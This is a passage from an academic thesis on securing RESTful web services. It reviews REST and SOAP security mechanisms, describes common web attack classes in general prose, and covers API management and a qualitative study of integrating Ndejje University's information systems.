As a solution, (Lee, Jo and Kim, 2017) proposed a new method, IBA that does not store the client's state. The proposed method is a lightweight, stateless, authentication mechanism for REST using ID-based cryptography, which we call ID-based authentication (IBA). In IBA, the receiving machine’s URI is virtually a public key, so there is no need to exchange the public keys separately. If a client knows the URI of the resource server (RS), the client can derive the public key of the RS from the URI and the master public key - and vice versa. They also can sign the message for mutual authentication using their own private keys. Therefore, both RS and the client can authenticate each other using only their URIs.

In their analysis of IBA, (Iacono, Nguyen and Gorski, 2019) commend the approach on ensuring authenticity, integrity and confidentiality of the whole HTTP message, as both requests and responses are protected by the scheme. However, the encryption of the whole message with the aim that only the endpoints are able to decrypt and interpret, violates the self- descriptive constraint of REST messages. With only the client and the server able to understand the intention of the message, intermediate systems have no ability to process the fully encrypted and signed message. Therefore, if an intermediary is unable to understand and process a traversing message, it may reject forwarding the message or cancel the communication. Another shortcoming of IBA is a missing time variant parameter in the signature process, which makes the scheme vulnerable to replay attacks (Iacono, Nguyen and Gorski, 2019). Moreover, (De Backere, et al., 2014) further caution that the use of these URIs to transfer important data may result in privacy breaches as data is not anonymized.

2.3 Vulnerabilities to RESTful Web Services

2.3.1 Cross-Site Scripting (XSS) attack

XSS is the top most vulnerability found in web applications today (Gupta and Gupta, 2017). A web application is vulnerable to XSS attacks when malicious contents can flow into web responses without being fully sanitized (Li and Xue, 2014). This allows the attacker to execute malicious scripts in victims’ browsers, since the web browser trusts the contents returned by the web application under the same-origin policy. Common consequences of XSS attacks include disclosure of users’ sensitive information, such as cookie details and credit card information. XSS also frequently serves as the first step that enables more sophisticated attacks (e.g., the notorious MySpace Samy worm).

According to (Li and Xue, 2014), there are several variants of XSS attacks based on how the malicious scripts are injected. Reflected XSS is launched when the victim clicks a crafted web link, which echoes back the XSS payload through the web application and enables its execution. Persistent (second-order) XSS happens when the malicious scripts are sent to the application back-end database as, for example, forum posts and comments, and stored for a period of time. The malicious scripts are triggered by the victim later when he visits a web page that contains the scripts. DOM-based XSS occurs when the malicious scripts are injected into the client-side JavaScript code for execution, even without sending to the server side. It is worth noting that DOM-based XSS is extremely difficult to handle using only server-side defenses. This does not cover all types of XSS, as there are others left unmentioned (e.g., content sniffing XSS and CSS-based XSS).

2.3.2 Injection Attacks

When inputs are not sufficiently or correctly validated, attackers are able to craft malformed inputs, which can alter program executions and gain unauthorized access to resources. Input validation vulnerability is a long-lived problem in software security (Li and Xue, 2014). Incorrect or insufficient input validation could invite a variety of attacks, such as buffer overflow attacks and code injection attacks (such as script and SQL injection). One of the most popular code injection attacks in Web Applications is the SQL Injection. A web application is vulnerable to SQL injection attacks when malicious content can flow into SQL queries without being fully sanitized, which allows the attacker to trigger malicious SQL operations by injecting SQL keywords or operators. For example, the attacker can append a separate SQL query to the existing query, causing the application to drop the entire table or manipulate the return result. Malicious SQL statements can be introduced into a vulnerable application using many different input mechanisms, including user inputs, cookies, and server variables. A special case of SQL injection is second-order SQL injection, where the attacker stores the malicious content into the database and triggers its execution at a later time. Second-order SQL injection is much more difficult to identify and can bypass insufficient sanitization functions. SQL injections can lead to authentication bypass, information disclosure, and other problems.

2.3.3 Cross-Site Request Forgery (CSRF)

CSRF refers to a type of Internet-based fraud in which a party's web browser is caused to perform an unwanted action at a target website (Amit, et al., 2011). In a typical example of CSRF, a bank customer using a web browser accesses a website that typically does not belong to the customer's bank and that contains malicious instructions placed there by an attacker. The malicious instructions causes the bank customer's browser to send a transaction request to the customer's bank without the bank customer's knowledge, such as a request to transfer funds from the bank customer's bank account to the attacker's bank account.

2.3.4 Insecure Direct Object Reference

A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, a directory, or a database key (Caviglione, Coccoli and Merlo, 2014). Without proper checks attackers can manipulate these references to access unauthorized data.

2.3.5 Parameter Tampering

The form processing performed by the browser mostly involves checking user provided inputs for errors (Bisht, et al., 2010). For instance, an electronic commerce application accepting credit card payments requires the credit card expiry date to be valid (e.g., be a date in future and be a valid month / day combination). Once the input data has been validated, it is sent to the server as part of an HTTP request, with inputs appearing as parameters to the request. A server accepting such a request may be vulnerable to attack if it assumes that the supplied parameters are valid (e.g., the credit card has not yet expired). This assumption is indeed enforced by the browser-side JavaScript; however, malicious users can circumvent client-side validation by disabling JavaScript, changing the code itself, or simply crafting an HTTP request by hand with any parameter values of the user’s choice. Servers with parameter tampering vulnerabilities are open to a variety of attacks (such as enabling unauthorized access, SQL injection, Cross-site scripting).

2.4 SOAP Security Mechanisms

SOAP is a messaging protocol that allows applications to communicate using HTTP and XML (Halili and Ramadani, 2018). Unlike REST, SOAP limits itself to the use of XML to provide a platform-independent extensible format which can be transferred via various underlying protocols such as HTTP, JMS or SMTP (Gorski, at al., 2014; Halili and Ramadani, 2018).

In order to ensure confidentiality and integrity of XML documents, XML Encryption, XML Signature and the XML Key Management Specification (XKMS) were introduced by the W3C (World Wide Web Consortium).

XML Signature and XML Encryption are used to provide integrity and confidentiality respectively. Although these two standards are based on digital signatures and encryption, none of them define any new cryptographic algorithms (Nordbotten, 2009). Instead, XML Signature and XML Encryption define how to apply well established digital signature/encryption algorithms to XML. This includes:

i) A standardized way to represent signatures, encrypted data, and information about the associated key(s) in XML, independent of whether the signed/encrypted resource is an XML resource or not,
ii) The possibility to sign and/or encrypt selected parts of an XML document,
iii) The means to transform two logically equivalent XML documents, but with syntactic differences, into the same physical representation. This is referred to as canonicalization. In order to be able to verify the signature of an XML resource that has had its representation changed, but still has the same logical meaning, it is essential that canonicalization is performed as part of the XML signature creation and verification processes (Nordbotten, 2009).

As both XML Signature and XML Encryption rely on the use of cryptographic keys, key management is a prerequisite for their effective use on a larger scale. Therefore, the XML Key Management Specification (XKMS) was created to be suitable for use in combination with XML Signature and XML Encryption. XKMS basically defines simple Web services interfaces for key management, thereby hiding the complexity of traditional public key infrastructures (PKIs) from the clients.

In order to extend SOAP message security, OASIS (Organization for the Advancement of Structured Information Standards) defined the WS-Security specification (Gorski, et al., 2014). WS-Security is based on XML Encryption and XML Signature. WS-Security specifies how to apply XML Signature and XML Encryption to SOAP messages, effectively providing integrity and confidentiality to SOAP messages (or parts of SOAP messages). Multiple encryptions can be used within the same SOAP message. Therefore, different parts of a SOAP message may be encrypted for different receivers (Nordbotten, 2009).

Abbildung in dieser Leseprobe nicht enthalten

Figure 2: SOAP Web Service Security Stack (Gorski, et al., 2014)

Figure 2 illustrates the SOAP security stack with the defined specifications. In addition to providing confidentiality and integrity for SOAP messages, WS-Security also provides a mechanism to avoid replay attacks (i.e., timestamps) and a way to include security tokens in SOAP messages. Security tokens are typically used to provide authentication and authorization (Nordbotten, 2009).

WS-Security is only concerned with securing a single SOAP message or a single SOAP request/response exchange, with no notion of a communication session. In cases where multiple message exchanges are expected, WS-SecureConversation may be used to establish and maintain an authenticated context. The authenticated context is represented by a URI in a context token and consists of a shared secret that can be used for key derivation. WS- SecureConversation relies on WS-Trust to establish the security context. WS- SecureConversation is an OASIS standard that defines how a secure exchange of multiple messages has to be established in terms of a session (Gorski, et al., 2014). WS-Trust basically defines a framework for obtaining security tokens (including the context tokens used in WS- SecureConversation) and brokering of trust (Nordbotten, 2009; Iacono, Nguyen and Gorski, 2019).

With a range of Web services standards, interoperability becomes very difficult unless the communicating parties know what standards to use and how these standards are to be used. Web Services Policy provides the means by which service providers and clients can specify their interoperability requirements and capabilities. WS-SecurityPolicy can be viewed as an extension to Web Services Policy, defining how Web Services Policy can be used to specify requirements and capabilities regarding the use of WS-Security, WS-Trust, and WS- SecureConversation. For instance, a service provider may specify using WS-Policy/WS- SecurityPolicy that it requires certain message parts to be encrypted (Nordbotten, 2009; Gorski, et al., 2014; Iacono, Nguyen and Gorski, 2019).

The last two standards in SOAP are the Security Assertion Markup Language (SAML) and the eXtensible Access Control Markup Language (XACML). SAML is based on XML and may be used to communicate authentication, attribute, and authorization information in a trusted way. Though its original motivation was based on single sign-on for Web browsing, SAML is also well suited for use in Web services. XACML on the other hand is used to define access control policies in XML, and may be used to define access control policies for any type of resource. Because SAML and XACML are not targeted exclusively at Web services, SAML and XACML were not included in Figure 2 above. However, this does not imply that there is no interaction between these standards. A XACML implementation may for instance rely on the security tokens of WS-Security for authentication. As to security tokens, there is also a SAML based security token in WS-Security (Nordbotten, 2009).

2.5 Vulnerabilities to SOAP

However, just like any distributed application running on the Internet, SOAP-based services suffer from the attack vectors common to this environment (Gorski, et al., 2014). The Web Services Description Language (WSDL), for example, is a standard for describing web service contracts. Usually, a WSDL service description is automatically generated by a web service framework which use conventions to generate the name of the service. An attacker can exploit this property by guessing names of non-public services. Further issues can arise from the external entities XML feature with which data outside a document can be referred by declaring an URI to it. So-called external entity attacks exploit this feature by including an external entity element with an URI referring to files within the file system of the service provider in order to access secret information. Moreover, an attacker can also include an URI to malicious code in the hope that the XML parser of the service provider executes it. Another variant of the external entity attack misleads the XML parser to access an URI whose endpoint never responses. This keeps the XML parser in an infinite loop with the aim to cause a denial of service.

A further famous example for a denial-of-service attack against the XML parser is the so-called XML bomb. This attack is hidden in a valid XML documents and causes a crash or freeze when the program tries to parse the XML. This results into interpreting a vast amount of nested entities which cause an exponential rise of data to be processed and kept in memory.

XPath is a query language for accessing elements in XML documents. Applications which use XML to store data and XPath to address information might be vulnerable for malicious injections similar to SQL injection. If the application does not validate user-supplied input accurately, an attacker could exploit this flaw and bypass authentication or access data, which is usually only accessible to privileged users. XML signature wrapping attacks define an injection of a forged XML node into a valid signed XML document. The attack is successful because the signature validating and the application logic of the payload are separated. So the signature verifier will accept the signature value of the XML while the forged node is processed. As one possible consequence, authorization mechanisms can be compromised. In order to prevent such attacks a specific signature generation and verification procedure needs to be adhered to (Gorski, et al., 2014).

2.6 Comparison of REST-Security and SOAP-Security Mechanisms

WS-Security and its relatives have been established as a stable and overarching umbrella of standards for securing web services based on SOAP. SOAP-based Web services include a variety of standards such as WSDL, WSBPEL, WS-Security and WS-Addressing (responsible for the Web service and message addressing), among many. These standards were developed by standardization organizations such as W3C and OASIS (Tihomirovs and Grabis, 2016). SOAP's comprehensive set of security standards makes it well suited for many applications including mission-critical and business-critical systems with high security demands. The use of SOAP can be observed in various contemporary IT systems such as Cloud Computing, e­Health and Identity infrastructures (Gorski, et al., 2014).

REST has become very popular in recent years primarily in mobile applications where performance and usability is more important than security. However, SOAP is preferred to REST in applications which require stronger security because it lacks specified security standards. It should be noted that the REST architectural style is yet to be standardized. Therefore, in order for the REST-security to close the gap on SOAP Security, (Gorski, et al., 2014) proposed a roadmap to a comprehensive security framework, comparable to SOAP Security stack.

Abbildung in dieser Leseprobe nicht enthalten

Figure 3: Proposed RESTful Web Service Security Stack (Gorski, Iacono, Nguyen and Torkian, 2014)

Figure 3 shows the desired RESTful Web service security stack. The authors' methodology for achieving their goal of building a RESTful Web service security stack was to take the SOAP­based Web service security stack as a baseline. However, about five years later, the same authors observed that the plain adoption of WS-Security to REST and instantiations of REST is not feasible in a straightforward manner (Iacono, Nguyen and Gorski, 2019). Even though both security stacks have similarities, REST being a very general concept needs to be handled accordingly. REST-security needs to be a general framework composed of definitions, structures and rules on how to protect REST-based systems. Additionally, REST represents an abstract model, therefore, security components for this architectural style need to be considered and defined on the same abstraction layer as well. The abstraction layer of REST and its instantiations have to be taken into account first. Therefore, a simple mapping of the concrete WS-Security technologies to construct REST-Security is not feasible, since both reside on different abstraction layers.

Previous analysis on the available standards and specifications, shows that most of the desired security components are not yet available, as the white-colored boxes in Figure 3 emphasize (Gorski, et al., 2014). Further, the same authors report that there are no standardized means to define security policies, to implement trust and federation schemes or to set up security sessions for multiple service invocations between the same pair of consumer and service. However, (Iacono, Nguyen and Gorski, 2019) report progress in form of the availability of some standards related to the authorization of service invocations such as OAuth and drafts on identity federation. However, the rest of the higher order security concepts such as the fundamental message security layer (which is signified by the hatched area in Fig. 3), trust, secure conversation and so forth are lacking entirely (Iacono, Nguyen and Gorski, 2019). Hence, to further support the growth of REST and to prepare the path for the adoption of REST in application domains with high security demands, a security stack as shown in Fig. 3 needs to be developed and standardized.

2.7 API Management

Customers today want to have access to enterprise data and services through a variety of digital devices and channels (Thomas and Gupta, 2016). To meet customer expectations, enterprises need to open their assets in an agile, flexible, secure and scalable. APIs form the window into an enterprise's data and services (De, 2017). They allow applications to easily communicate with each other using a lightweight protocol like HTTP. Developers use APIs to write applications that interact with the back-end systems. Once an API has been created, it needs to be managed using an API management platform (De, 2017).

An API management platform helps an organization to publish APIs to internal, partner and external developers to unlock the unique potential of their assets. It provides the core capabilities to ensure a successful API program through developer engagement, business insights, analytics, security and protection. An API management platform helps business accelerate outreach across digital channels, drive partner adoption, monetize digital assets and provide analytics to optimize investments in digital transformation. An API management platform enables you to create, analyze and manage APIs in a secure and scalable environment. An API management platform should provide the following capabilities: Developer enablement for APIs; Secure, Reliable and Flexible Communications; API lifecycle Management; and API Auditing, Logging and Analytics.

Abbildung in dieser Leseprobe nicht enthalten

Figure 4: API Management Capabilities (De, 2017)

The API management capabilities shown in Figure 4 above can be delivered by any API management vendor in a public cloud as a hosted service or can be deployed on premise in a private cloud. A hybrid approach with some components of the API management platform being offered as a hosted solution and others deployed on premise for increased security and control can also be followed.

Abbildung in dieser Leseprobe nicht enthalten

Figure 5: API Management Platform Services (De, 2017)

As illustrated in Figure 5, an API management platform provides these capabilities as three major types of services:

i) API gateway services allow you to create and manage APIs from existing data and services. They allow you to add security, traffic management, interface translation, orchestration and routing capabilities into your API.
ii) Analytics services monitor traffic from individual apps and provide business with insight and operational metrics, API and app performance and developer engagement metrics.
iii) Developer portals provide capabilities for the developer and app registration and onboarding, API documentation, community management and API monetization.

2.7.1 Secure, Reliable and Flexible Communication

APIs help digital apps to communicate with back-end services. Communication forms the core of APIs. For communication to take place, APIs can make use of REST, SOAP, Plain Old XML (POX), or any other protocol of choice. REST is by far the most preferred communication protocol for APIs due to its inherent characteristics, which have already been discussed earlier in this chapter (De, 2017; Iacono, Nguyen and Gorski, 2019). An API management platform must provide a framework that allows secure, reliable and flexible channels of communication. The API gateway within the API management platform provides the services that form the core capabilities required for API communications.

2.7.1.1 API Gateway

An API gateway forms the heart of any API management solution that enables secure, flexible and reliable communication between the back-end services and digital apps. It helps to expose, secure and manage back-end data and services as RESTful APIs. It provides a framework to create a facade in front of the back-end services (IBM, n.d.). This facade intercepts the API requests to enforce security, validate data, transform messages, throttle traffic, and finally route it to the back-end service. The static response may be cached to improve the performance. The API gateway can optionally orchestrate requests between multiple back-end services and also connect to databases to service the request. All of these functionalities can be implemented in a gateway, mostly through configurations and scripting extensions.

Abbildung in dieser Leseprobe nicht enthalten

Figure 6: API Gateway Capabilities (De, 2017)

API Security API Security is one of the main features of an API gateway. This API gateway component enforces security. In that role, the API gateway applies configured policies to all traffic including authentication, authorization, traffic management, routing, and other types of policies.

i) Encryption support: To increase mobile and API security for protecting mission- critical transactions, the API gateway provides JSON Encryption, JSON Signature, JSON Key, and JSON Token. It also protects mission-critical applications from security vulnerabilities with enhanced TLS protocol support using elliptic curve cryptography (ECC), Server Name Indication (SNI), and perfect forward secrecy (PFS).
ii) Policy authoring: To simplify policy authoring, the API gateway pre-configured policies can be used to enable quick delivery of gateway capabilities without any custom policy authoring or coding.
iii) Open standards: From an openness standpoint, the API gateway provides flexible user authentication for single sign-on (SSO) to web, mobile, and API workloads using social (such as Google) or enterprise identities based on OpenID connect.
iv) OAuth authorization standard: The API gateway supports OAuth. When you create an OAuth security definition in an API, you provide settings for controlling access to the API operations through the OAuth authorization standard. OAuth is a token-based authorization protocol that allows third-party websites or applications to access user data without requiring the user to share personal information.

2.7.2 API Lifecycle Management

There are four key phases in the lifecycle of an API, each of which requires a rich set of capabilities (IBM, n.d.).

1. Create phase

The create phase covers the development lifecycle, design, model, test, build, and deploy.

i) Rapid model-driven API creation: Create a model representing a resource that API management can use in a variety of ways, such as exposing it via a set of REST endpoints, persisting it to a data source (for example, in-memory or MySQL), or manipulating it programmatically as a JavaScript object.
ii) Data source to API mapping automation: Create models by discovering fields from existing database tables on various types of databases, such as MySQL, Oracle, PostgreSQL, and SQL Server.
iii) Standards-based visual API spec creation in Swagger 2.0: Create OpenAPI (Swagger 2.0) definition files for created APIs.
iv) Local API creation and testing: Empower developers to create and test APIs locally on their laptops and stage them to an on-premises or cloud deployment.
v) On-cloud and on-premises staging of APIs and packaging them into plans and products: Create products that include plans of created APIs and copy all files to the target, whether it is on premises or on cloud, without running the application (which only happens after publishing).

2. Run phase

This phase covers the performance, scalability, load and resilience of the API runtime platform.

i) Polyglot micro-services runtime: Create the micro-services by using unified Java and Node operations and management.
ii) Integrated runtime management for availability, load, and performance. Configure runtimes to meet runtime requirements
iii) Enterprise high availability and scaling: Deploy multiple management servers and multiple gateway servers to achieve high availability, scalability, or resilience.
iv) On-cloud and on-premises staging of micro-services applications: Create micro­service implementation to the target whether it is on premises or on cloud before making it available to application developers.

3. Manage phase

This phase covers the publicizing, socializing, management, governance, and cataloging of APIs as well as the user management of API consumers and providers. It also covers the monitoring, collection, and analysis of API metrics.

i) API discovery model: Publish APIs for application developers to find and use in their applications.
ii) API, plan, and product policy creation: If not already done during “Create” phase, create plans, products, and associate policies to them.
iii) API, plan, and product lifecycle management: Manage the lifecycle of APIs, plans, and products.
iv) API visibility via self-service, customizable developer portals: Control access to APIs, plans, and products so that they can only be accessed by authorized application developers.
v) Advanced analytics on API usage and performance metrics: Monitor the usage and performance of published APIs.
vi) Subscription and community management: Manage user accounts of application developers who can access the developer portal.

4. Secure phase:

The secure phase covers the runtime security enforcement of APIs in terms of authentication, authorization, rate limits, encryption, and creating proxies of APIs (IBM, n.d.).

i) Dynamic API policy enforcement: Dynamically associate a loosely-coupled policy to an API without needing to restart it or use late binding to associate policies at runtime.
ii) Enterprise security and gateway capability: Control and secure access to endpoints against threats and unauthorized usage.
iii) Quota management and rate limiting: Block access to APIs when an application behaves suspiciously, exceeds rate limits, or becomes compromised.
iv) Content-based routing: Configure the gateway to route based on a protocol such as HTTP, specific information, or a URL. Alternatively, program how matching using a style sheet happens.
v) Response caching, load balancing, and offload processing: Cache response from API calls, load balance over multiple back ends, and perform processing on requests or responses to offload back ends using policies.

2.7.3 API Auditing, Logging and Analytics

Businesses need to have insight into the API-based programs to justify and make the right investments to build the right APIs. They need to understand how an API is used, know who is using it, and see the value generated from it (De, 2017). With proper insight, business can then make decisions on how to enhance the business value either by changing the API or by enriching it. An API gateway should provide the capability to measure, monitor and report API usage analytics. Good business-friendly dashboards for API analytics measure and improve business value. A monetization report on API usage measure business value is yet another desirable feature on an API management platform.

2.8 Conclusion

In Section 2.1 to 2.3, the researcher aimed at gaining knowledge about the structure of RESTful web services, evaluating the current security implementations used in REST and understanding the vulnerabilities they face. By understanding the strengths and weaknesses of the existing security mechanisms in REST, the researcher was able to gather requirements for an improved security mechanism capable of outperforming all the existing mechanisms. Additionally, by identifying and understanding the vulnerabilities facing RESTful web services, the researcher was able to establish the parameters to be considered in both the testing and validation processes. The researcher reviewed the SOAP security mechanisms and vulnerabilities with an aim of establishing a direct comparison between REST Security and SOAP Security. The comparison was intended to identify some security implementations in SOAP that could be applied in REST, in order to improve its reliability in terms of security. Finally, the researcher’s intention was to develop an intermediary between the two different applications to facilitate communication between them. Therefore, a RESTful API was preferred for this purpose, hence the reason why section 4.7 covered API Management. From this section, the researcher was able to review existing literature regarding API development lifecycle, that is, how APIs are designed, tested, implemented, and deployed. The API Management section also covered how APIs are analyzed and managed in a secure and scalable environment.

CHAPTER THREE

RESEARCH METHODOLOGY

3.1 Introduction

This Chapter presents the description of the research process. It provides information concerning the method that was used in undertaking this research as well as a justification for the use of the method. The Chapter also describes the various stages of the research, which includes the data collection process, the process of data analysis, design and development. The Chapter ends with a discussion of test and validation of the proposed tool and discusses the way in which the developed requirements are to be met in the current study 3.1 Research design

This research is exploratory and applied in nature as it attempted to explore the experiences of users of web applications as well as providing a solution to the threats identified by the users. Therefore, for the purpose of this study, the research paradigm that was followed is of qualitative nature, using semi-structured interviews and brief questionnaires as well as observation.

Leedy (1993) explains that qualitative research is based on the belief that firsthand experience provides the most meaningful data. It is also believed that qualitative data gives large volumes of quality data from a limited number of people. It is aimed at understanding the world of participants from their frame of reference (Walker, 1985).

3.2 Area of study

Established in 1992, Ndejje University is the oldest private university in Uganda owned by six Church of Uganda Dioceses in Buganda Region. The University has two campuses i.e. in Luwero and Kampala, offering and awarding certificates in both undergraduate and graduate courses to over 5000 currently enrolled students. Ndejje University has two major information systems i.e. ZeeVarsity and ARMS (Academic Records Management System). ARMS handles academic processes only while ZeeVarsity, which is an integrated system, is expected to handle all University processes, including all those handled by ARMS. Both these systems are thought to be secure as there is no reported security breach.

3.3 Sample and Sampling technique

This sample population was selected following the purposive sampling because this technique helps identify people who can provide specific information rather than picking randomly.

A sample of 8 ICT staff were interviewed on how the current systems at Ndejje University work. This was further backed up by 2 developers who work with ZeeVarsity and ARMS. Additionally, 10 systems users mainly comprising of current Ndejje University students’ fraternity were included in this study to further assess the user experience on the University’s information systems. Class coordinators were preferred as the researcher envisaged that their views represented the student groups they led.

3.4 Data collection methods and instruments

3.4.1 Interviews (Group discussions)

A group of 20 stakeholders including information communication technology experts, students and staff at Ndejje University were interviewed. The interviews followed a set of guide questions to determine how systems at Ndejje University are developed, implemented and operationalized. This was done in order to capture group opinions rather than individual opinions.

3.4.2 Document Review

Document review is a way of collecting data by reviewing existing documents. The study used document review method to collect information regarding web services, security and implementation of web applications. Articles from different journals were reviewed and requirements determined.

3.5 Data Analysis

A text transcribed from the interviews was analyzed using the qualitative content analysis approach. Content analysis is a research technique used to make replicable and valid inferences by interpreting and coding textual material (Bengtsson, 2016). Content analysis can be used on all types of written texts no matter where the material comes from.

The researcher's intention for this study was to explore the experiences of the users of the University's web applications. By exploring the user experiences of the University's information systems, the researcher was able to clarify whether the users were in support of the integration of the University's autonomous information systems. Textual data transcribed from focus group interviews was presented in words and themes which made it possible to draw interpretation from the collected data. The researcher undertook a latent analysis by seeking an extended interpretive level of the underlying meaning of the transcribed text.

3.6 Design and implementation

3.6.1 Design

Web services are components that help integrate multiple systems running on different platforms. Therefore, a lot of message communication was used.

In designing the web service, the researcher used object-oriented designs thus employing Unified modeling language (UML) to illustrate how the service will be implemented and shared across multiple platforms.

Sequence diagrams were used to show how the different objects will communicate by clearing showing which object will initiate the communication, and when a given object will be active or destroyed.

Class diagrams were used to show the different classes and relationships between them. This further illustrated the different methods and variables that were required by the classes.

Activity diagrams were used in the study to illustrate the dynamic aspects of the service. It detailed the logical flow from one activity to another activity.

3.6.2 Development

The proposed security REST technique was developed using a multi-language and tools and these included Java, PHP and C#. This helped to show how REST can be used for interoperability and integration of the different application irrespective of the underlying programming language. Apache, glassfish and IIS were used as servers to test and run the different applications that were integrated with using REST.

3.7 Quality Control Methods

The term quality control refers to the efforts and procedures that survey researchers put in place to ensure the quality and accuracy of data being collected using the methodologies chosen for a particular study (Lavarakas, 2008).

The researcher deployed a two-phase quality control mechanism to ensure that all the data collected and analyzed is accurate. Each phase is detailed as follows: -

3.7.1 Development

In this phase the researcher further split into three other sub phases which included protocol development, questionnaire control and pilot testing.

During Protocol development, the researcher clearly defined what was expected out of the questionnaire and when in form of data. This was to help in the next sub phase questionnaire control.

The Questionnaire control phase mainly focused at developing a very good form with well- defined items to enable the respondents provide correct and accurate answers. The last sub phase of development is the pilot testing of the questionnaire. At this stage the researcher had to determine if what they wanted to collect was feasible to actually collect.

3.7.2 Data Collection

During this phase the researcher drafted an operation manual which was to give a guideline on how the collection of data was to be done. This was mainly to ensure a standard way of collecting data was followed. However, after the data was collected a review was done on it to ensure completeness before analysis.

Data integrity and security were also implemented on the Database to ensure that no one can alter the data but also to keep track of who did what with the data.

Data Entry, this being the second review of data after the one carried out during the data collection phase. This is again to ensure that the data being entered is correct and valid. This phase is followed by the Post Entry review and audits.

3.8 Test and Validation

3.8.1 Test

The developed REST was tested using two types of testing techniques that is Unit testing and Integration testing. Unit testing was used because it facilitates testing each individual code (method). Furthermore, Unit tests give certainty that lead to long term development phase and set a foundation block that is totally dependable.

Integration testing was used to determine if independently developed units of software work correctly when they are connected to each other. The main reason for using integration testing was to test whether many separately developed modules work together as expected. It was performed by activating many modules and running higher level tests against all of them to ensure they operated together.

3.8.2 Validation

Software Validation is a process of evaluating software product, so as to ensure that the software meets the pre-defined and specified business requirements as well as the end users’ or customers' demands and expectations. Validation was done by involving Information communication technology experts and developers to verify if the developed REST security technique fulfill the set requirements and meet the user requirements. A validation guide was developed and this guided the validators to check on the different functions.

3.9 Limitations of the study

Limited access to data and information in regard to the current systems. The study required extensive review of the current systems and how they are implemented. However, there was a limitation to access of this information. This could have been as a result of the sensitivity of the systems and the information they handle. The ZeeVarsity developer was especially conspicuous.

The study was also limited by time, since the deadlines were fixed a few days after classes. It was hard to work on the tight schedules to meet university deadlines. This impacted on the research results following that maybe if more time was allocated, the researcher would find more interesting findings.

Implementation of security in REST is still limited. Most of the available work relating to Restful web services is mainly focused on interoperability and data transfer.

CHAPTER FOUR

DESIGN, ANALYSIS AND DISCUSSION OF FINDINGS

4.0 Introduction

This chapter details the results or findings of the study. The data collected from the different sources was analyzed and summaries reported. Furthermore, the proposed security mechanism was designed, developed and the process was all documented in this section. The chapter concludes with a comparison of the proposed technique against the some of the common current security/authentication mechanisms in REST.

4.1 Demographic Information

The interviews carried out with the University staff, system users and developers were intended to find out how the stakeholders perceive the security and efficiency of the systems. It was also intended to find out how the developers implemented the different functions and components of the systems. The study comprised of a sample of 20 system users who included 8 University staff, 10 students and 2 developers (Developers representing ARMS and ZeeVarsity systems). The staff and students included both male and female as illustrated in the Figure 7. This showed that the most of the respondents were Male, however, this was being attributed to the interests of the respondents. Most people that were approached were not interested in the study due to their background or schedule of work.

Abbildung in dieser Leseprobe nicht enthalten

Figure 7: Demography based on Gender of Respondents

It was noted that the ratio of developers to users was 1:10. This is because most of the developers were not willing to provide information regarding the systems. This might have affected the results of the study in some way however, those developers that managed to provide information regarding their systems were very helpful in the study.

4.2 System Usage and Efficiency

The users reported on the usage and efficiency of the system. It was noted that the systems are able to execute the required functionalities though not efficiently as expected by the users. Users are frustrated by having different logins for every information system at the University. This requires them to keep multiple login details. Some users are required to manually fill data into a system, yet the same data is extracted from the other University-owned systems. This was reported as a hectic and tedious activity. Therefore, users would like to have a system that can automatically fetch any data required from another system in order to limit errors and time required to manually enter the data. Additionally, users prefer having a single login to the two major University information systems. The developers proposed that integrating the systems was possible, however it required a secure and simple to implement service since most of the data carried by the systems is very confidential. Further they noted that if a service is developed, this would improve on the interoperability and scalability of the systems. One respondent proposed developing the service following a standard SOAP protocol however this was declined by the other developer who proposed REST style because it was simple to implement even if the security in REST has vulnerabilities such as its underlying protocol HTTP. Additionally, the systems have to be accessed by users via expanding set of endpoints such as mobile devices, wearable devices, consumer and home electronic devices, automotive devices and environmental devices among many (Thomas and Gupta, 2016).

From the analysis of the data collected, the study focused on developing a secure RESTful web service. This is because it would be simple to implement in the organization and further the security can be improved with modification of the current security mechanism.

4.3 Document Analysis

4.3.1 WS-Security for REST services

REST does not have predefined security methods so developers define their own, and often, the developers are in a hurry to deploy their web services deployed, so, they do not treat them with the same level of diligence as they treat web applications. These conditions lead to web services with serious vulnerabilities (Dunlu and Qingkui, 2009) for instance, most APIs handle authentication using a key but no secret, essentially requiring a user name but no password. Another problem is using HTTP basic authentication (with no SSL) and letting the user name and password cross the wire with no encryption. REST APIs typically have the same attack vectors as standard web applications, including injection attacks, cross-site scripting (XSS), broken authentication and cross-site request forgery (CSRF)(Deepa and Thilagam, 2016).

4.3.2 Cipher Text Stealing

Cipher text Stealing (CTS) is a method used in modes of operations to deal with messages which cannot be divided into a multiple of the block size (e.g. 128 bit for AES). The benefit of CTS is to prevent any expansion of the cipher-text, at a cost of slightly increase in complexity (El-Fotouh and Diepold, 2008).

4.3.3 HOTP: HMAC-Based One-Time Password Algorithm

HOTP is a one-time password (OTP) algorithm based on hash-based message authentication codes (HMAC ) ( VeriSign, 2005). The HOTP algorithm is based on an increasing counter value and a static symmetric key known only to the token and the validation service. In order to create the HOTP value, we will use the HMAC- SHA-1 algorithm,

4.4 Existing Systems and Security mechanism

The existing system is using very simple authentication methods. Most of the applications are using text based username and password combination to authenticate users into the system. Applications have implemented application level roles to differentiate users. This kind of authentication mechanism is used in all Ndejje University applications or systems and each having different way of implementation. However, Web services can be used to communicate between the different university applications. Currently, Authentication and Authorization are only at web server level. Most of the applications are using Digest Authentication and roles for authorization illustrated in Figure 7. It was also reported that the systems are autonomous and work independently meaning that each system has its own server and the data from different systems cannot be integrated and thus cannot support interoperability. Taking the case of Ndejje University, it currently runs ARMS which is managed and hosted by the University, ZeeVarsity system which is managed and hosted by the developers, Zee-node. These two systems manage Student information but the University was forced to replicate the data to feed both system thus causing a lot of redundancy.

Since the client-server architecture was followed in the development and deployment of the current systems, they face a number of security threats that face client-server architecture which include but not limited to eavesdropping and denial of service.

Abbildung in dieser Leseprobe nicht enthalten

Figure 8: Client -Server Architecture- Digest Authentication

4.5 System and Security Requirements

System requirements are the configurations that a system must have in order for a hardware or software application to run smoothly and efficiently. Failure to meet these requirements can result in installation problems or performance problems (Technopedia.com, 2019). The requirements were determined following the review of documents and analysis of the responses from the developers and users. A number of requirements were identified and sub- divided/categorized into three main categories, that is, functional, non-functional and implementation specific requirements.

Functional requirements (“what the system should do”) are system requirements that describe what the system should able to do while non-functional requirements are extra functions or look and feel of the system but also describe how best the system works. Implementation specific requirements (“the way the system does it”) capture a very important aspect of the system that is not captured by functional and non-functional requirements. It captures how the functions are to be implemented or executed.

Abbildung in dieser Leseprobe nicht enthalten

Figure 9: Types of Requirements (Perforce, 2014)

4.6 Functional Requirements

